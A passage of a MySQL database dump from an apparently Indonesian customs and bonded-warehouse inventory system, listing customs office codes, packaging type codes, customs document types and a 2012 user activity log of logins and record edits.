DABO', ''); INSERT INTO kantor VALUES ('121032', 'POS BENJINA/P. KEI', ''); INSERT INTO kantor VALUES ('121033', 'POS SAUMLAKI', ''); INSERT INTO kantor VALUES ('121034', 'POS NGADI', ''); INSERT INTO kantor VALUES ('121035', 'POS ELAT', ''); INSERT INTO kantor VALUES ('121036', 'POS LARAT', ''); INSERT INTO kantor VALUES ('121037', 'POS WONRELI/KISAR', ''); INSERT INTO kantor VALUES ('121038', 'POS BANDARA D. DUMATUBUN LANGGUR', ''); INSERT INTO kantor VALUES ('121039', 'POS SERWARU', ''); INSERT INTO kantor VALUES ('121040', 'POS HWAKI/WETAR', ''); INSERT INTO kantor VALUES ('130000', 'KANTOR WILAYAH XIII BANDA ACEH', ''); INSERT INTO kantor VALUES ('130100', 'KANTOR PELAYANAN ULEELHEUE', ''); INSERT INTO kantor VALUES ('130111', 'KANTOR BANTU LHOK NGA', ''); INSERT INTO kantor VALUES ('130131', 'POS LAM PULO', ''); INSERT INTO kantor VALUES ('130132', 'POS SIGLI', ''); INSERT INTO kantor VALUES ('130133', 'POS COT BAU', ''); INSERT INTO kantor VALUES ('130134', 'POS MALAHAYATI', ''); INSERT INTO kantor VALUES ('130200', 'KANTOR PELAYANAN ISKANDAR MUDA', ''); INSERT INTO kantor VALUES ('130231', 'POS BANDARA ISKANDAR MUDA', ''); INSERT INTO kantor VALUES ('130300', 'KANTOR PELAYANAN SABANG', ''); INSERT INTO kantor VALUES ('130400', 'KANTOR PELAYANAN MEULABOH', ''); INSERT INTO kantor VALUES ('130411', 'KANTOR BANTU SINABANG', ''); INSERT INTO kantor VALUES ('130412', 'KANTOR BANTU TAPAK TUAN', ''); INSERT INTO kantor VALUES ('130413', 'KANTOR BANTU SINGKEL', ''); INSERT INTO kantor VALUES ('130431', 'POS SUSOH', ''); INSERT INTO kantor VALUES ('130500', 'KANTOR PELAYANAN LHOK SEUMAWE', ''); INSERT INTO kantor VALUES ('130511', 'KANTOR BANTU LHOK SUKON', ''); INSERT INTO kantor VALUES ('130531', 'POS BLANG LANCANG', ''); INSERT INTO kantor VALUES ('130532', 'POS KRUENG GEUKUH', ''); INSERT INTO kantor VALUES ('130600', 'KANTOR PELAYANAN KUALA LANGSA', ''); INSERT INTO kantor VALUES ('130631', 'POS KUALA LANGSA', ''); INSERT INTO kantor VALUES ('130632', 'POS SARANG JAYA', ''); INSERT INTO kantor VALUES ('160200', 'KANTOR PENGAWASAN DAN PELAYANAN SUNDA KELAPA', 'JAKARTA'); -- ---------------------------- -- Table structure for `kemasan` -- ---------------------------- DROP TABLE IF EXISTS `kemasan`; CREATE TABLE `kemasan` ( `KdKemas` varchar(2) NOT NULL DEFAULT '' COMMENT 'Kode Kemasan', `UrKemas` varchar(60) DEFAULT NULL COMMENT 'Uraian Kemasan', PRIMARY KEY (`KdKemas`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of kemasan -- ---------------------------- INSERT INTO kemasan VALUES ('AE', 'Aerosol'); INSERT INTO kemasan VALUES ('AM', 'Ampoule, non protected'); INSERT INTO kemasan VALUES ('AP', 'Ampoule, protected'); INSERT INTO kemasan VALUES ('AT', 'Atomizer'); INSERT INTO kemasan VALUES ('BA', 'Barrel'); INSERT INTO kemasan VALUES ('BB', 'Bobbin'); INSERT INTO kemasan VALUES ('BC', 'Bottlecrate, bottlerack'); INSERT INTO kemasan VALUES ('BD', 'Board'); INSERT INTO kemasan VALUES ('BE', 'Bundle'); INSERT INTO kemasan VALUES ('BF', 'Balloon, non-protected'); INSERT INTO kemasan VALUES ('BG', 'Bag'); INSERT INTO kemasan VALUES ('BH', 'Bunch'); INSERT INTO kemasan VALUES ('BI', 'Bin'); INSERT INTO kemasan VALUES ('BJ', 'Bucket'); INSERT INTO kemasan VALUES ('BK', 'Basket'); INSERT INTO kemasan VALUES ('BL', 'Bale, compressed'); INSERT INTO kemasan VALUES ('BN', 'Bale, non -compressed'); INSERT INTO kemasan VALUES ('BO', 'Bottle, non-protected, cylindrical'); INSERT INTO kemasan VALUES ('BP', 'Balloon, protected'); INSERT INTO kemasan VALUES ('BQ', 'Bottle, protected cylindrical'); INSERT INTO kemasan VALUES ('BR', 'Bar'); INSERT INTO kemasan VALUES ('BS', 'Bottle, non-protected, bulbous'); INSERT INTO kemasan VALUES ('BT', 'Bolt'); INSERT INTO kemasan VALUES ('BU', 'Butt'); INSERT INTO kemasan VALUES ('BV', 'Bottle, protected bulbous'); INSERT INTO kemasan VALUES ('BX', 'Box'); INSERT INTO kemasan VALUES ('BY', 'Board, in bundle/bunch/truss'); INSERT INTO kemasan VALUES ('BZ', 'Bars, in bundle/bunch/truss'); INSERT INTO kemasan VALUES ('CA', 'Can, rectangular'); INSERT INTO kemasan VALUES ('CB', 'Beer crate'); INSERT INTO kemasan VALUES ('CC', 'Churn'); INSERT INTO kemasan VALUES ('CE', 'Creel'); INSERT INTO kemasan VALUES ('CF', 'Coffer'); INSERT INTO kemasan VALUES ('CG', 'Cage'); INSERT INTO kemasan VALUES ('CH', 'Chest'); INSERT INTO kemasan VALUES ('CI', 'Canister'); INSERT INTO kemasan VALUES ('CJ', 'Coffin'); INSERT INTO kemasan VALUES ('CK', 'Cask'); INSERT INTO kemasan VALUES ('CL', 'Coil'); INSERT INTO kemasan VALUES ('CO', 'Carboy, non-protected'); INSERT INTO kemasan VALUES ('CP', 'Carboy, protected'); INSERT INTO kemasan VALUES ('CR', 'Crate'); INSERT INTO kemasan VALUES ('CS', 'Case'); INSERT INTO kemasan VALUES ('CT', 'Carton'); INSERT INTO kemasan VALUES ('CU', 'Cup'); INSERT INTO kemasan VALUES ('CV', 'Cover'); INSERT INTO kemasan VALUES ('CX', 'Can, cylindical'); INSERT INTO kemasan VALUES ('CY', 'Cylinder'); INSERT INTO kemasan VALUES ('CZ', 'Canvas'); INSERT INTO kemasan VALUES ('DJ', 'Demijohn, non-protected'); INSERT INTO kemasan VALUES ('DP', 'Demijohn, protected'); INSERT INTO kemasan VALUES ('DR', 'Drum'); INSERT INTO kemasan VALUES ('EN', 'Envelope'); INSERT INTO kemasan VALUES ('FC', 'Fruit crate'); INSERT INTO kemasan VALUES ('FD', 'Framed crate'); INSERT INTO kemasan VALUES ('FI', 'Firkin'); INSERT INTO kemasan VALUES ('FL', 'Flask'); INSERT INTO kemasan VALUES ('FO', 'Footlocker'); INSERT INTO kemasan VALUES ('FP', 'Filmpack'); INSERT INTO kemasan VALUES ('FR', 'Frame'); INSERT INTO kemasan VALUES ('GB', 'Gas bottle'); INSERT INTO kemasan VALUES ('GI', 'Girder'); INSERT INTO kemasan VALUES ('GZ', 'Girders, in bundle/bunch/truss'); INSERT INTO kemasan VALUES ('HG', 'Hogshead'); INSERT INTO kemasan VALUES ('HR', 'Hamper'); INSERT INTO kemasan VALUES ('IN', 'Ingot'); INSERT INTO kemasan VALUES ('IZ', 'ingots, in bundle/bunch/truss'); INSERT INTO kemasan VALUES ('JC', 'Jerrican, rectangular'); INSERT INTO kemasan VALUES ('JG', 'Jug'); INSERT INTO kemasan VALUES ('JR', 'Jar'); INSERT INTO kemasan VALUES ('JT', 'Jutebag'); INSERT INTO kemasan VALUES ('JY', 'Jerrican, cylindrical'); INSERT INTO kemasan VALUES ('KG', 'Keg'); INSERT INTO kemasan VALUES ('LG', 'Log'); INSERT INTO kemasan VALUES ('LZ', 'Logs, in bundle/bunch/truss'); INSERT INTO kemasan VALUES ('MB', 'Multiply bag'); INSERT INTO kemasan VALUES ('MC', 'milk crate'); INSERT INTO kemasan VALUES ('MS', 'Multiwall sack'); INSERT INTO kemasan VALUES ('MT', 'Mat'); INSERT INTO kemasan VALUES ('MX', 'Macth box'); INSERT INTO kemasan VALUES ('NE', 'Unpacked or unpackaged'); INSERT INTO kemasan VALUES ('NS', 'Nest'); INSERT INTO kemasan VALUES ('NT', 'Net'); INSERT INTO kemasan VALUES ('PA', 'Packet'); INSERT INTO kemasan VALUES ('PB', 'POLYBAG'); INSERT INTO kemasan VALUES ('PC', 'Parcel'); INSERT INTO kemasan VALUES ('PG', 'Plate'); INSERT INTO kemasan VALUES ('PH', 'Pitcher'); INSERT INTO kemasan VALUES ('PI', 'Pipe'); INSERT INTO kemasan VALUES ('PK', 'Package'); INSERT INTO kemasan VALUES ('PL', 'Pail'); INSERT INTO kemasan VALUES ('PN', 'Plank'); INSERT INTO kemasan VALUES ('PO', 'Pouch'); INSERT INTO kemasan VALUES ('PT', 'Pot'); INSERT INTO kemasan VALUES ('PU', 'Tray pack'); INSERT INTO kemasan VALUES ('PY', 'Plates, in bundle/bunch/truss'); INSERT INTO kemasan VALUES ('PZ', 'Planks/Pipes, in bundle/bunch/truss'); INSERT INTO kemasan VALUES ('RD', 'Rod'); INSERT INTO kemasan VALUES ('RG', 'Ring'); INSERT INTO kemasan VALUES ('RL', 'Reel'); INSERT INTO kemasan VALUES ('RO', 'Roll'); INSERT INTO kemasan VALUES ('RT', 'Rednet'); INSERT INTO kemasan VALUES ('RZ', 'Rods, in bundle/ bunch/truss'); INSERT INTO kemasan VALUES ('SA', 'Sack'); INSERT INTO kemasan VALUES ('SC', 'Shallow crate'); INSERT INTO kemasan VALUES ('SD', 'Spindle'); INSERT INTO kemasan VALUES ('SE', 'Sea-chest'); INSERT INTO kemasan VALUES ('SH', 'Sachet'); INSERT INTO kemasan VALUES ('SK', 'Skeleton case'); INSERT INTO kemasan VALUES ('SL', 'Slipsheet'); INSERT INTO kemasan VALUES ('SM', 'Sheetmetal'); INSERT INTO kemasan VALUES ('ST', 'Sheet'); INSERT INTO kemasan VALUES ('SU', 'Suitcase'); INSERT INTO kemasan VALUES ('SW', 'Shrinkwrapped'); INSERT INTO kemasan VALUES ('SZ', 'Sheets, in bundle/bunch/truss'); INSERT INTO kemasan VALUES ('TB', 'Tub'); INSERT INTO kemasan VALUES ('TC', 'Tea-chest'); INSERT INTO kemasan VALUES ('TD', 'Tube, collapsible'); INSERT INTO kemasan VALUES ('TK', 'Tank, rectangular'); INSERT INTO kemasan VALUES ('TN', 'Tin'); INSERT INTO kemasan VALUES ('TO', 'Tun'); INSERT INTO kemasan VALUES ('TP', 'Tray'); INSERT INTO kemasan VALUES ('TR', 'Trunk'); INSERT INTO kemasan VALUES ('TS', 'Truss'); INSERT INTO kemasan VALUES ('TU', 'Tube'); INSERT INTO kemasan VALUES ('TY', 'Tank, cylindrical'); INSERT INTO kemasan VALUES ('TZ', 'Tubes, in bundle/bunch/truss'); INSERT INTO kemasan VALUES ('UN', 'Unit'); INSERT INTO kemasan VALUES ('VA', 'Vat'); INSERT INTO kemasan VALUES ('VG', 'Bulk, gas ( at 1031 mbar and 15C )'); INSERT INTO kemasan VALUES ('VI', 'Vial'); INSERT INTO kemasan VALUES ('VL', 'Bulk, liquid'); INSERT INTO kemasan VALUES ('VO', 'Bulk, solid, large particles (\"nodules\")'); INSERT INTO kemasan VALUES ('VP', 'Vacuumpacked'); INSERT INTO kemasan VALUES ('VQ', 'Bulk, liquefied gas (at abnormal temperature)'); INSERT INTO kemasan VALUES ('VR', 'Bulk, solid, granular particles (\"grains\")'); INSERT INTO kemasan VALUES ('VY', 'Bulk, solid, fine particles (\"powders\")'); INSERT INTO kemasan VALUES ('WB', 'Wickerbottle'); -- ---------------------------- -- Table structure for `kode_jenis_dok` -- ---------------------------- DROP TABLE IF EXISTS `kode_jenis_dok`; CREATE TABLE `kode_jenis_dok` ( `KdKdJnsDok` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Kode Jenis Dokumen', `UrKdJnsDok` varchar(15) DEFAULT NULL COMMENT 'Nama Dokumen', PRIMARY KEY (`KdKdJnsDok`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of kode_jenis_dok -- ---------------------------- INSERT INTO kode_jenis_dok VALUES ('1', 'Invoice'); INSERT INTO kode_jenis_dok VALUES ('2', 'Packing List'); INSERT INTO kode_jenis_dok VALUES ('3', 'Kontrak'); INSERT INTO kode_jenis_dok VALUES ('4', 'Surat Jalan'); INSERT INTO kode_jenis_dok VALUES ('5', 'Skep'); INSERT INTO kode_jenis_dok VALUES ('6', 'Lainnya'); INSERT INTO kode_jenis_dok VALUES ('7', 'ex BC 2.3'); INSERT INTO kode_jenis_dok VALUES ('8', 'ex BC 2.4'); INSERT INTO kode_jenis_dok VALUES ('9', 'ex BC 2.5'); INSERT INTO kode_jenis_dok VALUES ('10', 'ex BC 2.6.1'); INSERT INTO kode_jenis_dok VALUES ('11', 'ex BC 2.6.2'); INSERT INTO kode_jenis_dok VALUES ('12', 'ex BC 2.7'); INSERT INTO kode_jenis_dok VALUES ('13', 'ex BC 3.0'); INSERT INTO kode_jenis_dok VALUES ('14', 'ex BC 4.0'); INSERT INTO kode_jenis_dok VALUES ('15', 'ex BC 4.1'); INSERT INTO kode_jenis_dok VALUES ('16', 'LC'); INSERT INTO kode_jenis_dok VALUES ('17', 'BL/AWB'); INSERT INTO kode_jenis_dok VALUES ('18', 'BC 1.1'); -- ---------------------------- -- Table structure for `log` -- ---------------------------- DROP TABLE IF EXISTS `log`; CREATE TABLE `log` ( `no` int(12) NOT NULL AUTO_INCREMENT, `tgl` datetime DEFAULT NULL, `nama_user` varchar(20) DEFAULT NULL, `ket` text, PRIMARY KEY (`no`) ) ENGINE=InnoDB AUTO_INCREMENT=739 DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of log -- ---------------------------- INSERT INTO log VALUES ('521', '2012-10-14 20:37:16', 'admin', 'Add initial balance machine & office equipment 2012-10-14 3'); INSERT INTO log VALUES ('522', '2012-10-14 20:37:56', 'admin', 'Delete initial balance machine & office equipment 2012-10-14 3'); INSERT INTO log VALUES ('523', '2012-10-16 10:33:52', 'admin', 'login'); INSERT INTO log VALUES ('524', '2012-10-16 13:34:35', 'admin', 'login'); INSERT INTO log VALUES ('525', '2012-10-16 14:13:28', 'admin', 'login'); INSERT INTO log VALUES ('526', '2012-10-16 15:50:40', 'admin', 'login'); INSERT INTO log VALUES ('527', '2012-10-16 17:29:44', 'admin', 'login'); INSERT INTO log VALUES ('528', '2012-10-16 20:23:45', 'admin', 'login'); INSERT INTO log VALUES ('529', '2012-10-17 08:19:34', 'admin', 'login'); INSERT INTO log VALUES ('530', '2012-10-17 09:19:18', 'admin', 'ubah data company CLARION'); INSERT INTO log VALUES ('531', '2012-10-17 09:21:57', 'admin', 'ubah data company CLARION'); INSERT INTO log VALUES ('532', '2012-10-17 09:22:52', 'admin', 'ubah data company CLARION'); INSERT INTO log VALUES ('533', '2012-10-17 09:34:29', 'admin', 'ubah data company PT. ALUMINDO LIGHT METAL INDUSTRY'); INSERT INTO log VALUES ('534', '2012-10-17 11:31:43', 'admin', 'Add initial balance material 1 2012-10-17'); INSERT INTO log VALUES ('535', '2012-10-17 13:39:40', 'admin', 'login'); INSERT INTO log VALUES ('536', '2012-10-17 14:00:24', 'admin', 'Add initial balance material 3 2012-10-17'); INSERT INTO log VALUES ('537', '2012-10-17 14:23:25', 'admin', 'Add initial balance wip 2 2012-10-18'); INSERT INTO log VALUES ('538', '2012-10-17 14:27:28', 'admin', 'Add initial balance machine & office equipment 2012-10-15 3'); INSERT INTO log VALUES ('539', '2012-10-17 14:29:27', 'admin', 'Add initial balance machine & office equipment 2012-10-15 5'); INSERT INTO log VALUES ('540', '2012-10-17 15:45:30', 'admin', 'Edit po customer 25'); INSERT INTO log VALUES ('541', '2012-10-17 15:45:32', 'admin', 'Edit po customer 25'); INSERT INTO log VALUES ('542', '2012-10-17 16:31:32', 'admin', 'login'); INSERT INTO log VALUES ('543', '2012-10-17 11:55:07', 'admin', 'logout'); INSERT INTO log VALUES ('544', '2012-10-18 08:17:16', 'admin', 'login'); INSERT INTO log VALUES ('545', '2012-10-18 10:06:33', 'admin', 'login'); INSERT INTO log VALUES ('546', '2012-10-18 10:37:19', 'admin', 'Add wip 2 2012-10-18'); INSERT INTO log VALUES ('547', '2012-10-18 10:43:01', 'admin', 'Add wip 2 2012-10-18'); INSERT INTO log VALUES ('548', '2012-10-18 10:53:28', 'admin', 'Add wip 2 2012-10-18'); INSERT INTO log VALUES ('549', '2012-10-18 11:12:32', 'admin', 'Add fg production result 3 2012-10-18'); INSERT INTO log VALUES ('550', '2012-10-18 15:34:12', 'admin', 'login'); INSERT INTO log VALUES ('551', '2012-10-20 20:16:29', 'admin', 'login'); INSERT INTO log VALUES ('552', '2012-10-20 20:40:28', 'admin', 'edit finished goods WIP1'); INSERT INTO log VALUES ('553', '2012-10-20 17:13:41', 'admin', 'logout'); INSERT INTO log VALUES ('554', '2012-10-21 09:59:30', 'admin', 'login'); INSERT INTO log VALUES ('555', '2012-10-21 13:29:04', 'admin', 'login'); INSERT INTO log VALUES ('556', '2012-10-21 15:07:29', 'admin', 'login'); INSERT INTO log VALUES ('557', '2012-10-22 08:47:36', 'admin', 'login'); INSERT INTO log VALUES ('558', '2012-10-22 11:02:16', 'admin', 'login'); INSERT INTO log VALUES ('559', '2012-10-22 12:33:51', 'admin', 'login'); INSERT INTO log VALUES ('560', '2012-10-22 13:44:32', 'admin', 'login'); INSERT INTO log VALUES ('561', '2012-10-22 14:32:33', 'admin', 'login'); INSERT INTO log VALUES ('562', '2012-10-22 16:06:24', 'admin', 'login'); INSERT INTO log VALUES ('563', '2012-10-22 18:21:49', 'admin', 'login'); INSERT INTO log VALUES ('564', '2012-10-23 17:00:48', 'admin', 'login'); INSERT INTO log VALUES ('565', '2012-10-23 17:10:13', 'admin', 'login'); INSERT INTO log VALUES ('566', '2012-10-23 17:28:42', 'admin', 'login'); INSERT INTO log VALUES ('567', '2012-10-23 17:34:49', 'admin', 'login'); INSERT INTO log VALUES ('568', '2012-10-23 18:24:06', 'admin', 'login'); INSERT INTO log VALUES ('569', '2012-10-24 09:02:44', 'admin', 'login'); INSERT INTO log VALUES ('570', '2012-10-25 08:45:43', 'admin', 'login'); INSERT INTO log VALUES ('571', '2012-10-25 10:05:10', 'admin', 'login'); INSERT INTO log VALUES ('572', '2012-10-25 11:38:40', 'admin', 'login'); INSERT INTO log VALUES ('573', '2012-10-26 10:25:03', 'admin', 'login'); INSERT INTO log VALUES ('574', '2012-10-26 11:23:46', 'admin', 'login'); INSERT INTO log VALUES ('575', '2012-10-26 11:26:13', 'admin', 'Edit po customer 25'); INSERT INTO log VALUES ('576', '2012-10-26 06:27:19', 'admin', 'logout'); INSERT INTO log VALUES ('577', '2012-10-26 12:19:13', 'admin', 'login'); INSERT INTO log VALUES ('578', '2012-10-26 15:28:35', 'admin', 'login'); INSERT INTO log VALUES ('579', '2012-10-27 20:34:13', 'admin', 'login'); INSERT INTO log VALUES ('580', '2012-10-27 21:17:04', 'admin', 'Add delivery order 3'); INSERT INTO log VALUES ('581', '2012-10-27 21:19:35', 'admin', 'Delete delivery order 3'); INSERT INTO log VALUES ('582', '2012-10-27 16:44:11', 'admin', 'logout'); INSERT INTO log VALUES ('583', '2012-10-28 13:54:34', 'admin', 'login'); INSERT INTO log VALUES ('584', '2012-10-28 14:16:03', 'admin', 'Add po 6'); INSERT INTO log VALUES ('585', '2012-10-28 14:17:03', 'admin', 'Add matin 2'); INSERT INTO log VALUES ('586', '2012-10-28 09:29:18', 'admin', 'logout'); INSERT INTO log VALUES ('587', '2012-10-28 16:55:22', 'admin', 'login'); INSERT INTO log VALUES ('588', '2012-10-28 17:03:40', 'admin', 'tambah data barang SC001'); INSERT INTO log VALUES ('589', '2012-10-28 17:04:25', 'admin', 'Add initial balance machine & office equipment 2012-10-28 12'); INSERT INTO log VALUES ('590', '2012-10-28 17:19:36', 'admin', 'Add matin 3'); INSERT INTO log VALUES ('591', '2012-10-28 17:36:23', 'admin', 'Add outgoing material 5'); INSERT INTO log VALUES ('592', '2012-10-28 17:39:39', 'admin', 'Edit initial balance machine & office equipment 2012-10-28 12'); INSERT INTO log VALUES ('593', '2012-10-28 17:42:47', 'admin', 'Add stock opname 3'); INSERT INTO log VALUES ('594', '2012-10-28 17:43:50', 'admin', 'Add stock adjustment 4'); INSERT INTO log VALUES ('595', '2012-10-28 18:50:40', 'admin', 'login'); INSERT INTO log VALUES ('596', '2012-10-28 18:51:03', 'admin', 'Edit initial balance machine & office equipment 2012-10-27 12'); INSERT INTO log VALUES ('597', '2012-10-28 19:07:33', 'admin', 'Delete initial balance machine & office equipment 2012-09-30 12'); INSERT INTO log VALUES ('598', '2012-10-28 19:08:33', 'admin', 'Add initial balance machine & office equipment 1 2012-10-28 12'); INSERT INTO log VALUES ('599', '2012-10-28 19:11:42', 'admin', 'Edit initial balance machine & office equipment 2012-10-28 12'); INSERT INTO log VALUES ('600', '2012-10-28 19:12:41', 'admin', 'Add stock adjustment 4'); INSERT INTO log VALUES ('601', '2012-10-28 19:20:41', 'admin', 'Edit initial balance machine & office equipment 2012-10-15 3'); INSERT INTO log VALUES ('602', '2012-10-28 19:21:01', 'admin', 'Edit initial balance machine & office equipment 2012-10-15 5'); INSERT INTO log VALUES ('603', '2012-10-28 19:22:32', 'admin', 'Edit matin 2'); INSERT INTO log VALUES ('604', '2012-10-28 19:24:40', 'admin', 'Add outgoing material 6'); INSERT INTO log VALUES ('605', '2012-10-28 19:26:34', 'admin', 'Edit stock opname 3'); INSERT INTO log VALUES ('606', '2012-10-28 19:27:07', 'admin', 'Add stock adjustment 4'); INSERT INTO log VALUES ('607', '2012-10-28 14:12:19', 'admin', 'logout'); INSERT INTO log VALUES ('608', '2012-10-29 08:06:12', 'admin', 'login'); INSERT INTO log VALUES ('609', '2012-10-29 10:53:09', 'admin', 'login'); INSERT INTO log VALUES ('610', '2012-10-29 11:16:19', 'admin', 'login'); INSERT INTO log VALUES ('611', '2012-10-29 12:47:36', 'admin', 'login'); INSERT INTO log VALUES ('612', '2012-10-29 13:15:20', 'admin', 'login'); INSERT INTO log VALUES ('613', '2012-10-29 13:52:29', 'admin', 'login'); INSERT INTO log VALUES ('614', '2012-10-29 15:22:45', 'admin', 'login'); INSERT INTO log VALUES ('615', '2012-10-29 15:53:48', 'admin', 'tambah data bc40 8 000002'); INSERT INTO log VALUES ('616', '2012-10-29 16:05:15', 'admin', 'ubah data bc40 8 000002'); INSERT INTO log VALUES ('617', '2012-10-29 16:07:09', 'admin', 'ubah data bc40 8 000002'); INSERT INTO log VALUES ('618', '2012-10-30 07:04:37', 'admin', 'login'); INSERT INTO log VALUES ('619', '2012-10-30 07:12:23', '', 'tambah data bc262 '); INSERT INTO log VALUES ('620', '2012-10-30 14:15:52', 'admin', 'login'); INSERT INTO log VALUES ('621', '2012-10-30 14:19:50', '', 'tambah data bc262 5 000002'); INSERT INTO log VALUES ('622', '2012-10-30 14:20:06', '', 'hapus data bc 5 000002'); INSERT INTO log VALUES ('623', '2012-10-30 14:22:31', '', 'tambah data bc262 5 000002'); INSERT INTO log VALUES ('624', '2012-10-30 14:22:45', '', 'hapus data bc 5 000002'); INSERT INTO log VALUES ('625', '2012-10-30 14:23:22', '', 'tambah data bc262 5 000002'); INSERT INTO log VALUES ('626', '2012-10-30 14:35:39', 'admin', 'Add outgoing material 7'); INSERT INTO log VALUES ('627', '2012-10-30 14:43:52', '', 'tambah data bc41 9 000002'); INSERT INTO log VALUES ('628', '2012-10-30 14:44:17', '', 'ubah data bc41 9 000002'); INSERT INTO log VALUES ('629', '2012-10-30 14:44:41', '', 'ubah data bc41 9 000002'); INSERT INTO log VALUES ('630', '2012-10-30 14:48:05', 'admin', 'Edit outgoing material 7'); INSERT INTO log VALUES ('631', '2012-10-30 14:50:09', '', 'tambah data bc261 4 000002'); INSERT INTO log VALUES ('632', '2012-10-30 14:51:04', '', 'ubah data bc261 4 000002'); INSERT INTO log VALUES ('633', '2012-10-30 14:55:50', 'admin', 'Edit outgoing material 7'); INSERT INTO log VALUES ('634', '2012-10-30 17:13:17', 'admin', 'login'); INSERT INTO log VALUES ('635', '2012-10-31 08:48:12', 'admin', 'login'); INSERT INTO log VALUES ('636', '2012-10-31 08:49:38', '', 'tambah data bc25 3 000002'); INSERT INTO log VALUES ('637', '2012-10-31 09:25:54', 'admin', 'Edit matin 2'); INSERT INTO log VALUES ('638', '2012-10-31 09:26:34', 'admin', 'Edit outgoing material 7'); INSERT INTO log VALUES ('639', '2012-10-31 09:41:17', '', 'tambah data bc27 6 000002'); INSERT INTO log VALUES ('640', '2012-10-31 09:42:04', '', 'ubah data bc27 6 000002'); INSERT INTO log VALUES ('641', '2012-10-31 09:50:56', 'admin', 'Edit matin 2'); INSERT INTO log VALUES ('642', '2012-10-31 09:53:19', 'admin', 'tambah data bc23 1 000701'); INSERT INTO log VALUES ('643', '2012-10-31 09:56:16', 'admin', 'ubah data bc23 1 000701'); INSERT INTO log VALUES ('644', '2012-10-31 10:11:47', 'admin', 'tambah data bc30 7 000002'); INSERT INTO log VALUES ('645', '2012-10-31 10:13:33', '', 'hapus data bc 7 000002'); INSERT INTO log VALUES ('646', '2012-10-31 10:14:10', 'admin', 'tambah data bc30 7 000002'); INSERT INTO log VALUES ('647', '2012-10-31 10:17:59', '', 'hapus data bc 7 000002'); INSERT INTO log VALUES ('648', '2012-10-31 10:18:32', 'admin', 'tambah data bc30 7 000002'); INSERT INTO log VALUES ('649', '2012-10-31 04:18:50', 'admin', 'logout'); INSERT INTO log VALUES ('650', '2012-10-31 10:25:46', 'admin', 'login'); INSERT INTO log VALUES ('651', '2012-11-05 09:46:34', 'admin', 'login'); INSERT INTO log VALUES ('652', '2012-11-05 03:49:17', 'admin', 'logout'); INSERT INTO log VALUES ('653', '2012-11-13 09:15:41', 'admin', 'login'); INSERT INTO log VALUES ('654', '2012-11-13 03:19:32', 'admin', 'logout'); INSERT INTO log VALUES ('655', '2012-11-13 09:58:16', 'admin', 'login'); INSERT INTO log VALUES ('656', '2012-11-13 04:00:34', 'admin', 'logout'); INSERT INTO log VALUES ('657', '2012-11-13 13:22:59', 'admin', 'login'); INSERT INTO log VALUES ('658', '2012-11-13 14:46:37', 'admin', 'login'); INSERT INTO log VALUES ('659', '2012-11-13 14:48:03', 'admin', 'Add initial balance material 1 2012-11-13'); INSERT INTO log VALUES ('660', '2012-11-13 14:56:13', 'admin', 'Edit consumption list 123'); INSERT INTO log VALUES ('661', '2012-11-14 11:27:51', 'admin', 'login'); INSERT INTO log VALUES ('662', '2012-11-14 05:28:17', 'admin', 'logout'); INSERT INTO log VALUES ('663', '2012-11-14 21:26:10', 'admin', 'login'); INSERT INTO log VALUES ('664', '2012-11-14 16:02:22', 'admin', 'logout'); INSERT INTO log VALUES ('665', '2012-11-14 22:02:30', 'admin', 'login'); INSERT INTO log VALUES ('666', '2012-11-14 16:15:19', 'admin', 'logout'); INSERT INTO log VALUES ('667', '2012-11-14 22:15:28', 'admin', 'login'); INSERT INTO log VALUES ('668', '2012-11-14 22:40:06', 'admin', 'login'); INSERT INTO log VALUES ('669', '2012-11-14 16:58:12', 'admin', 'logout'); INSERT INTO log VALUES ('670', '2012-11-14 22:58:22', 'bc', 'login'); INSERT INTO log VALUES ('671', '2012-11-14 16:58:28', 'bc', 'logout'); INSERT INTO log VALUES ('672', '2012-11-14 22:58:42', 'exim', 'login'); INSERT INTO log VALUES ('673', '2012-11-14 16:58:48', 'exim', 'logout'); INSERT INTO log VALUES ('674', '2012-11-14 22:59:42', 'admin', 'login'); INSERT INTO log VALUES ('675', '2012-11-14 23:00:32', 'admin', 'ubah data user administration asep'); INSERT INTO log VALUES ('676', '2012-11-14 23:01:41', 'admin', 'ubah data user administration asep'); INSERT INTO log VALUES ('677', '2012-11-14 17:01:46', 'admin', 'logout'); INSERT INTO log VALUES ('678', '2012-11-14 23:02:13', 'exim', 'login'); INSERT INTO log VALUES ('679', '2012-11-14 17:02:21', 'exim', 'logout'); INSERT INTO log VALUES ('680', '2012-11-14 23:02:28', 'admin', 'login'); INSERT INTO log VALUES ('681', '2012-11-14 23:02:48', 'admin', 'ubah data user administration asep'); INSERT INTO log VALUES ('682', '2012-11-14 17:02:54', 'admin', 'logout'); INSERT INTO log VALUES ('683', '2012-11-14 23:03:01', 'asep', 'login'); INSERT INTO log VALUES ('684', '2012-11-14 17:03:08', 'asep', 'logout'); INSERT INTO log VALUES ('685', '2012-11-14 23:03:16', 'admin', 'login'); INSERT INTO log VALUES ('686', '2012-11-14 23:03:33', 'admin', 'ubah data user administration asep'); INSERT INTO log VALUES ('687', '2012-11-14 17:03:37', 'admin', 'logout'); INSERT INTO log VALUES ('688', '2012-11-14 23:03:45', 'asep', 'login'); INSERT INTO log VALUES ('689', '2012-11-14 17:04:00', 'asep', 'logout'); INSERT INTO log VALUES ('690', '2012-11-14 23:44:09', 'admin', 'login'); INSERT INTO log VALUES ('691', '2012-11-14 17:44:14', 'admin', 'logout'); INSERT INTO log VALUES ('692', '2012-11-19 16:56:59', 'admin', 'login'); INSERT INTO log VALUES ('693', '2012-11-21 16:33:06', 'admin', 'login'); INSERT INTO log VALUES ('694', '2012-11-25 13:37:08', 'admin', 'login'); INSERT INTO log VALUES ('695', '2012-11-26 11:16:48', 'admin', 'login'); INSERT INTO log VALUES ('696', '2012-11-26 11:54:53', 'admin', 'login'); INSERT INTO log VALUES ('697', '2012-11-26 11:58:57', 'admin', 'Edit matin 2'); INSERT INTO log VALUES ('698', '2012-11-26 11:59:55', 'admin', 'tambah data bc40 8 000003'); INSERT INTO log VALUES ('699', '2012-11-26 13:26:13', 'admin', 'login'); INSERT INTO log VALUES ('700', '2012-11-26 13:36:46', 'admin', 'tambah data user administration nunik'); INSERT INTO log VALUES ('701', '2012-11-26 13:37:21', 'admin', 'ubah data user administration nunik'); INSERT INTO log VALUES ('702', '2012-11-26 13:37:28', 'admin', 'hapus data user administration nunik2'); INSERT INTO log VALUES ('703', 